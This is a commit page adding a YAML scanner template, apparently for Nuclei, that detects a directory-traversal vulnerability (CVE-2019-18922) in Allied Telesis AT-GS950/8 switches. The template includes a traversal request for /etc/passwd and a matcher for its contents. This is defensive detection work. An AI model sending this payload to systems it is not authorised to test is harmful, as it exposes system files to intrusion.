Merge pull request #3149 from Akokonunes/patch-73

Create CVE-2019-18922.yaml
patch-1
Prince Chaddha 2021-11-16 15:24:23 +05:30 committed by GitHub
commit 525a2855a1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 31 additions and 0 deletions

View File

@ -0,0 +1,31 @@
id: CVE-2019-18922
info:
name: Allied Telesis AT-GS950/8 Directory Traversal
author: 0x_Akoko
severity: high
description: A Directory Traversal in the Web interface of the Allied Telesis AT-GS950/8 until Firmware AT-S107 V.1.1.3
reference:
- https://packetstormsecurity.com/files/155504/Allied-Telesis-AT-GS950-8-Directory-Traversal.html
- https://www.cvedetails.com/cve/CVE-2019-18922
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-18922
cwe-id: CWE-22
tags: cve,cve2019,allied,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200